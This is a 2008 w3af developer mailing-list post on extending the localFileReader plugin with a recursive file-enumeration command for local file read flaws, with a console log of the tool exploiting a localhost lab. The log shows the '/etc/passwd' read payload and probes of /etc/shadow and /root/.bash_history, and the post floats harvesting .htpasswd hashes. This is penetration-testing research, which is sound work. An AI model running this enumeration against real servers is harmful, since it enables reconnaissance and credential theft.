[W3af-develop] Exploiting a local file read vulnerability with w3af

Andres Riancho Sat, 27 Dec 2008 19:25:11 -0800

List,

    Last Friday at the office one of the guys found a vulnerability in
a web application, the vulnerability was the classic
index.php?filename=/etc/passwd that let's you read the content of any
file given that you know it's location and apache has the correct
permissions to read it.


    After that, I slightly modified the attack.localFileReader plugin
from w3af in order to work as expected, and during the last hour I've
been playing with a nice idea, that I wanted to share. The idea is
pretty simple, but I haven't seen it implemented in any other
software. First of all, a small introduction to
attack.localFileReader: basically you only have one command, "cat",
which allows you to print the content of a file using a local file
inclusion/read vulnerability. Using that, I wanted to obtain a list of
files that may contain important information for me as a penetration
tester from the remote web server... so basically I added the "list"
command, that operates as follows:

- cat a non existent file, and save the response
- cat a lot of common files, and compare them with the non existent
response, if they differ, then the file exists
- for all the files that I just found, parse them, and try to find
references to other files. For example, if I found out that
/etc/init.d/apache2 exists, and I parse it, I would obtain a list with
(for example) /bin/sh, /usr/sbin/apache2ctl, /usr/sbin/htcacheclean,
etc.
- for every reference found in any of the previous files, run the process again.

    At first I thought that this would give me a few files out of the
ones I already know that were there, and that I would hit a dead end
after calling the method recursively one or two times. But I was
mistaken, and I'm happy to say it =) Here are some results:

Recursion level 0, 15 unique files.
Recursion level 1, 37 unique files.
Recursion level 2, 60 unique files.
Recursion level 3, 1162 unique files.
Recursion level 4, 2903 unique files.

    I wanted to test it with a recursion level greater than 4, but it
took too much time. For those who are curious, see the attached file
for a run of the attack plugin.

    After finishing my implementation, I started to wonder... what
else could be achieved (in an automated fashion of course) using a
local file read vulnerability? Here are some ideas that I still have
to add to the plugin:

    - OS identification: Easy one, because you could just "cat
/etc/debian_version", and if it's there, you know it's debian and the
content of the file tells you what version you are using (some
problems with Ubuntu may arise).

    - .htaccess and .htpasswd files that may contain weak hashes: For
every directory that the list command finds, we could request
/directory/.htaccess and /directory/.htpasswd . Too many requests?
Maybe request .ht* only for directories that contain "www" or "htdocs"
or something like that?

    Can you think about other interesting techniques that can be
applied to this vulnerability in order to gain more information about
the target server? Thanks for your input!

Cheers,
-- 
Andres Riancho
http://w3af.sourceforge.net/
Web Application Attack and Audit Framework

w3af>>> plugins
w3af/plugins>>> audit localFileInclude
w3af/plugins>>> output console,textFile
w3af/plugins>>> output config textFile
w3af/plugins/output/config:textFile>>> set fileName output-w3af.txt
w3af/plugins/output/config:textFile>>> set verbose True
w3af/plugins/output/config:textFile>>> back
w3af/plugins>>> discovery webSpider
w3af/plugins>>> discovery config webSpider
w3af/plugins/discovery/config:webSpider>>> set onlyForward True
w3af/plugins/discovery/config:webSpider>>> back
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target 
http://localhost/w3af/audit/local_file_inclusion/index.html
w3af/config:target>>> back
w3af>>> start
Auto-enabling plugin: discovery.allowedMethods
New URL found by webSpider plugin: 
http://localhost/w3af/audit/local_file_inclusion/false_positive.php
New URL found by webSpider plugin: 
http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php
New URL found by webSpider plugin: 
http://localhost/w3af/audit/local_file_inclusion/lfi_2.php
New URL found by webSpider plugin: 
http://localhost/w3af/audit/local_file_inclusion/lfi_1.php
New URL found by webSpider plugin: 
http://localhost/w3af/audit/local_file_inclusion/
Found 6 URLs and 6 different points of injection.
The list of URLs is:
- http://localhost/w3af/audit/local_file_inclusion/false_positive.php
- http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php
- http://localhost/w3af/audit/local_file_inclusion/lfi_2.php
- http://localhost/w3af/audit/local_file_inclusion/lfi_1.php
- http://localhost/w3af/audit/local_file_inclusion/
- http://localhost/w3af/audit/local_file_inclusion/index.html
The list of fuzzable requests is:
- http://localhost/w3af/audit/local_file_inclusion/index.html | Method: GET
- http://localhost/w3af/audit/local_file_inclusion/false_positive.php | Method: 
GET | Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php | Method: 
GET | Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/lfi_2.php | Method: GET | 
Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/lfi_1.php | Method: GET | 
Parameters: (file)
- http://localhost/w3af/audit/local_file_inclusion/ | Method: GET
Starting localFileInclude plugin execution.
File fragments have been found. The following is a list of file fragments that 
were returned by the web application while testing for local file inclusion: 
- "root:x:0:0:" 
- "daemon:x:1:1:" 
- ":/bin/bash" 
- ":/bin/sh" 
". This is just an informational message, which might be related to a 
vulnerability and was found on response with id 74.
Local File Inclusion was found at: 
"http://localhost/w3af/audit/local_file_inclusion/trivial_lfi.php";, using HTTP 
method GET. The sent data was: "file=%2Fetc%2Fpasswd". The vulnerability was 
found in the request with id 74.
Finished scanning process.
w3af>>> exploit
w3af/exploit>>> exploit localFileReader
localFileReader exploit plugin is starting.
The vulnerability was found using method GET, but POST is being used during 
this exploit.
Vulnerability successfully exploited. This is a list of available shells and 
proxies:
- [0] <shell object (rsystem: "linux")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>> interact 0
Execute "endInteraction" to get out of the remote shell.Commands typed in this 
menu will be runned on the remote web server.
w3af/exploit/localFileReader-0>>> list
/etc/apache2/httpd.conf
/etc/bash.bashrc
/etc/crontab
/etc/environment
/etc/fstab
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/inetd.conf
/etc/init.d/apache2
/etc/motd
/etc/passwd
/etc/shadow                             Permission denied.
/etc/sudoers                            Permission denied.
/root/.bash_history                     Permission denied.
w3af/exploit/localFileReader-0>>> list -r 1
/bin/bash
/bin/false
/bin/sh
/bin/sync
/etc/apache2/envvars
/etc/apache2/httpd.conf
/etc/bash.bashrc
/etc/bash_completion
/etc/crontab
/etc/default/apache2
/etc/default/rcS
/etc/environment
/etc/fstab
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/inetd.conf
/etc/init.d/apache2
/etc/motd
/etc/passwd
/lib/lsb/init-functions
/usr/bin/python
/usr/bin/sudo
/usr/lib/command-not-found
/usr/sbin/anacron
/usr/sbin/apache2
/usr/sbin/apache2ctl
/usr/sbin/htcacheclean
/usr/sbin/nologin
/dev/scd0                               Permission denied.
/dev/sda1                               Permission denied.
/dev/sda5                               Permission denied.
/etc/shadow                             Permission denied.
/etc/sudoers                            Permission denied.
/root/.bash_history                     Permission denied.
/var/lib/gdm                            Permission denied.
/var/lib/tor                            Permission denied.
w3af/exploit/localFileReader-0>>> list -r 2
/bin/bash
/bin/dash
/bin/echo
/bin/false
/bin/pidof
/bin/sh
/bin/sync
/etc/apache2/envvars
/etc/apache2/httpd.conf
/etc/bash.bashrc
/etc/bash_completion
/etc/crontab
/etc/debian_version
/etc/default/apache2
/etc/default/rcS
/etc/environment
/etc/fstab
/etc/group
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/inetd.conf
/etc/init.d/apache2
/etc/lsb-base-logging.sh
/etc/motd
/etc/network/interfaces
/etc/passwd
/etc/shells
/etc/ssh/ssh_config
/etc/ssl/openssl.cnf
/lib/ld-linux.so.2
/lib/lsb/init-functions
/proc/filesystems
/sbin/lsmod
/sbin/modinfo
/sbin/start-stop-daemon
/usr/bin/expr
/usr/bin/python
/usr/bin/sudo
/usr/bin/tput
/usr/bin/vi
/usr/lib/command-not-found
/usr/lib/sudo/sudo_noexec.so
/usr/sbin/anacron
/usr/sbin/apache2
/usr/sbin/apache2ctl
/usr/sbin/htcacheclean
/usr/sbin/nologin
/usr/share/dict/words
/var/lib/dpkg/status
/var/run/apache2.pid
/dev/scd0                               Permission denied.
/dev/sda1                               Permission denied.
/dev/sda5                               Permission denied.
/etc/shadow                             Permission denied.
/etc/sudoers                            Permission denied.
/etc/wvdial.conf                        Permission denied.
/root/.bash_history                     Permission denied.
/var/lib/gdm                            Permission denied.
/var/lib/tor                            Permission denied.
w3af/exploit/localFileReader-0>>> endInteraction
w3af/exploit>>> exit
w3af/exploit>>>

------------------------------------------------------------------------------

_______________________________________________
W3af-develop mailing list
W3af-develop@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/w3af-develop

[W3af-develop] Exploiting a local file read vulnerability with w3af

Reply via email to